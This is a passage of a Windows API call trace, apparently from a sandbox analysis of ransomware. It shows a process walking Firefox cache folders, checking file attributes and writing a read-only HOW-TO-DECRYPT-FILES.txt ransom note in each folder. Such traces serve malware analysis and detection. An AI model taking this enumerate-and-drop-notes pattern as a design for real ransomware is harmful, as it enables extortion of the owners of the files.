lpBuffer=0x18e70c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\6", lpFilePart=0x0) returned 0x50 [0049.301] GetLastError () returned 0x0 [0049.301] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.301] GetLastError () returned 0x0 [0049.301] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\6", nBufferLength=0x105, lpBuffer=0x18e5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\6", lpFilePart=0x0) returned 0x50 [0049.301] GetLastError () returned 0x0 [0049.301] SetErrorMode (uMode=0x1) returned 0x0 [0049.301] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\6\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.301] GetLastError () returned 0x0 [0049.302] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.302] SetErrorMode (uMode=0x0) returned 0x1 [0049.302] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\6", nBufferLength=0x105, lpBuffer=0x18e5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\6", lpFilePart=0x0) returned 0x50 [0049.302] GetLastError () returned 0x12 [0049.302] SetErrorMode (uMode=0x1) returned 0x0 [0049.302] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\6\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.302] GetLastError () returned 0x12 [0049.302] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.302] SetErrorMode (uMode=0x0) returned 0x1 [0049.302] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7", nBufferLength=0x105, lpBuffer=0x18e70c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7", lpFilePart=0x0) returned 0x50 [0049.302] GetLastError () returned 0x12 [0049.302] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.302] GetLastError () returned 0x12 [0049.302] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7", nBufferLength=0x105, lpBuffer=0x18e5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7", lpFilePart=0x0) returned 0x50 [0049.302] GetLastError () returned 0x12 [0049.302] SetErrorMode (uMode=0x1) returned 0x0 [0049.302] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.302] GetLastError () returned 0x12 [0049.302] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.302] SetErrorMode (uMode=0x0) returned 0x1 [0049.302] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7", nBufferLength=0x105, lpBuffer=0x18e5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7", lpFilePart=0x0) returned 0x50 [0049.302] GetLastError () returned 0x12 [0049.302] SetErrorMode (uMode=0x1) returned 0x0 [0049.302] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.303] GetLastError () returned 0x12 [0049.303] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.303] SetErrorMode (uMode=0x0) returned 0x1 [0049.303] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\1D", nBufferLength=0x105, lpBuffer=0x18e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\1D", lpFilePart=0x0) returned 0x53 [0049.303] GetLastError () returned 0x12 [0049.303] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.303] GetLastError () returned 0x12 [0049.303] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\1D", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\1D", lpFilePart=0x0) returned 0x53 [0049.303] GetLastError () returned 0x12 [0049.303] SetErrorMode (uMode=0x1) returned 0x0 [0049.303] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\1D\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.303] GetLastError () returned 0x12 [0049.303] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.303] SetErrorMode (uMode=0x0) returned 0x1 [0049.303] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\1D", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\1D", lpFilePart=0x0) returned 0x53 [0049.303] GetLastError () returned 0x12 [0049.304] SetErrorMode (uMode=0x1) returned 0x0 [0049.304] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\1D\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.304] GetLastError () returned 0x12 [0049.304] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.304] SetErrorMode (uMode=0x0) returned 0x1 [0049.304] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\1D\\20628d01", nBufferLength=0x105, lpBuffer=0x18e62c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\1D\\20628d01", lpFilePart=0x0) returned 0x5c [0049.304] GetLastError () returned 0x12 [0049.304] SetErrorMode (uMode=0x1) returned 0x0 [0049.304] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\1D\\20628d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\7\\1d\\20628d01"), fInfoLevelId=0x0, lpFileInformation=0x1cbe2f8 | out: lpFileInformation=0x1cbe2f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc2ab5450, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc2ab5450, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc2b27870, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0xa600)) returned 1 [0049.304] GetLastError () returned 0x12 [0049.304] SetErrorMode (uMode=0x0) returned 0x1 [0049.304] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\1D\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\7\\1d\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.304] GetLastError () returned 0x0 [0049.304] GetFileType (hFile=0x184) returned 0x1 [0049.305] SetErrorMode (uMode=0x0) returned 0x1 [0049.305] GetFileType (hFile=0x184) returned 0x1 [0049.305] WriteFile (in: hFile=0x184, lpBuffer=0x1cda24c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1cda24c*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.305] GetLastError () returned 0x0 [0049.306] CloseHandle (hObject=0x184) returned 1 [0049.306] GetLastError () returned 0x0 [0049.306] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\1D\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.306] GetLastError () returned 0x0 [0049.306] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\26\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.306] GetLastError () returned 0x0 [0049.306] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.306] SetErrorMode (uMode=0x0) returned 0x1 [0049.306] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\26\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.306] GetLastError () returned 0x12 [0049.306] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.306] SetErrorMode (uMode=0x0) returned 0x1 [0049.306] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\26\\90EEBd01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\7\\26\\90eebd01"), fInfoLevelId=0x0, lpFileInformation=0x1cdd83c | out: lpFileInformation=0x1cdd83c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc49810f0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc49810f0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc49810f0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x144cd)) returned 1 [0049.307] GetLastError () returned 0x12 [0049.307] SetErrorMode (uMode=0x0) returned 0x1 [0049.307] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\26\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\7\\26\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.307] GetLastError () returned 0x0 [0049.307] GetFileType (hFile=0x184) returned 0x1 [0049.307] SetErrorMode (uMode=0x0) returned 0x1 [0049.307] GetFileType (hFile=0x184) returned 0x1 [0049.307] WriteFile (in: hFile=0x184, lpBuffer=0x1cf9790*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1cf9790*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.308] GetLastError () returned 0x0 [0049.308] CloseHandle (hObject=0x184) returned 1 [0049.308] GetLastError () returned 0x0 [0049.308] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\26\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.308] GetLastError () returned 0x0 [0049.308] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\5B\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.309] GetLastError () returned 0x0 [0049.309] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.309] SetErrorMode (uMode=0x0) returned 0x1 [0049.309] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\5B\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.309] GetLastError () returned 0x12 [0049.309] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.309] SetErrorMode (uMode=0x0) returned 0x1 [0049.309] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\5B\\B8120d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\7\\5b\\b8120d01"), fInfoLevelId=0x0, lpFileInformation=0x1cfcd80 | out: lpFileInformation=0x1cfcd80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc4d66ce0, ftCreationTime.dwHighDateTime=0x1d2fb2e, ftLastAccessTime.dwLowDateTime=0xc4d66ce0, ftLastAccessTime.dwHighDateTime=0x1d2fb2e, ftLastWriteTime.dwLowDateTime=0xc4db2fa0, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x1a531)) returned 1 [0049.310] GetLastError () returned 0x12 [0049.310] SetErrorMode (uMode=0x0) returned 0x1 [0049.310] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\5B\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\7\\5b\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.311] GetLastError () returned 0x0 [0049.311] GetFileType (hFile=0x184) returned 0x1 [0049.311] SetErrorMode (uMode=0x0) returned 0x1 [0049.311] GetFileType (hFile=0x184) returned 0x1 [0049.311] WriteFile (in: hFile=0x184, lpBuffer=0x1d18cd4*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1d18cd4*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.312] GetLastError () returned 0x0 [0049.312] CloseHandle (hObject=0x184) returned 1 [0049.312] GetLastError () returned 0x0 [0049.312] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\5B\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.312] GetLastError () returned 0x0 [0049.312] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\D6\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.312] GetLastError () returned 0x0 [0049.312] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.312] SetErrorMode (uMode=0x0) returned 0x1 [0049.312] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\D6\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.312] GetLastError () returned 0x12 [0049.312] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.313] SetErrorMode (uMode=0x0) returned 0x1 [0049.313] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\D6\\7F060d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\7\\d6\\7f060d01"), fInfoLevelId=0x0, lpFileInformation=0x1d1c2c4 | out: lpFileInformation=0x1d1c2c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc23dd510, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc23dd510, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc255a2d0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x25172)) returned 1 [0049.313] GetLastError () returned 0x12 [0049.313] SetErrorMode (uMode=0x0) returned 0x1 [0049.313] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\D6\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\7\\d6\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.313] GetLastError () returned 0x0 [0049.313] GetFileType (hFile=0x184) returned 0x1 [0049.313] SetErrorMode (uMode=0x0) returned 0x1 [0049.313] GetFileType (hFile=0x184) returned 0x1 [0049.313] WriteFile (in: hFile=0x184, lpBuffer=0x1b3bbf4*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1b3bbf4*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.314] GetLastError () returned 0x0 [0049.314] CloseHandle (hObject=0x184) returned 1 [0049.315] GetLastError () returned 0x0 [0049.315] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\7\\D6\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.315] GetLastError () returned 0x0 [0049.315] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\8\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.315] GetLastError () returned 0x0 [0049.315] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.315] SetErrorMode (uMode=0x0) returned 0x1 [0049.315] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\8\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.315] GetLastError () returned 0x12 [0049.315] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.316] SetErrorMode (uMode=0x0) returned 0x1 [0049.316] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\8\\AE\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.316] GetLastError () returned 0x12 [0049.316] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.316] SetErrorMode (uMode=0x0) returned 0x1 [0049.316] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\8\\AE\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.316] GetLastError () returned 0x12 [0049.316] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.316] SetErrorMode (uMode=0x0) returned 0x1 [0049.316] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\8\\AE\\93407d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\8\\ae\\93407d01"), fInfoLevelId=0x0, lpFileInformation=0x1b409ec | out: lpFileInformation=0x1b409ec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc4d131f0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc4d131f0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc4d5f4b0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x14f74)) returned 1 [0049.316] GetLastError () returned 0x12 [0049.316] SetErrorMode (uMode=0x0) returned 0x1 [0049.316] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\8\\AE\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\8\\ae\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.317] GetLastError () returned 0x0 [0049.317] GetFileType (hFile=0x184) returned 0x1 [0049.317] SetErrorMode (uMode=0x0) returned 0x1 [0049.317] GetFileType (hFile=0x184) returned 0x1 [0049.317] WriteFile (in: hFile=0x184, lpBuffer=0x1b5c834*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1b5c834*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.318] GetLastError () returned 0x0 [0049.318] CloseHandle (hObject=0x184) returned 1 [0049.318] GetLastError () returned 0x0 [0049.318] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\8\\AE\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.318] GetLastError () returned 0x0 [0049.318] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.318] GetLastError () returned 0x0 [0049.318] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.318] SetErrorMode (uMode=0x0) returned 0x1 [0049.318] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.318] GetLastError () returned 0x12 [0049.319] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.319] SetErrorMode (uMode=0x0) returned 0x1 [0049.319] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\10\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.319] GetLastError () returned 0x12 [0049.319] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.319] SetErrorMode (uMode=0x0) returned 0x1 [0049.319] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\10\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.319] GetLastError () returned 0x12 [0049.319] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.320] SetErrorMode (uMode=0x0) returned 0x1 [0049.320] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\10\\16A09d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\9\\10\\16a09d01"), fInfoLevelId=0x0, lpFileInformation=0x1b61b68 | out: lpFileInformation=0x1b61b68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x88d1aae0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x88d1aae0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x88d40c40, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x534f)) returned 1 [0049.320] GetLastError () returned 0x12 [0049.320] SetErrorMode (uMode=0x0) returned 0x1 [0049.320] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\10\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\9\\10\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.320] GetLastError () returned 0x0 [0049.320] GetFileType (hFile=0x184) returned 0x1 [0049.320] SetErrorMode (uMode=0x0) returned 0x1 [0049.320] GetFileType (hFile=0x184) returned 0x1 [0049.320] WriteFile (in: hFile=0x184, lpBuffer=0x1b7d9b0*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1b7d9b0*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.321] GetLastError () returned 0x0 [0049.321] CloseHandle (hObject=0x184) returned 1 [0049.321] GetLastError () returned 0x0 [0049.322] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\10\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.322] GetLastError () returned 0x0 [0049.322] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\2C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.322] GetLastError () returned 0x0 [0049.322] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.322] SetErrorMode (uMode=0x0) returned 0x1 [0049.322] FindFirstFileW (in: 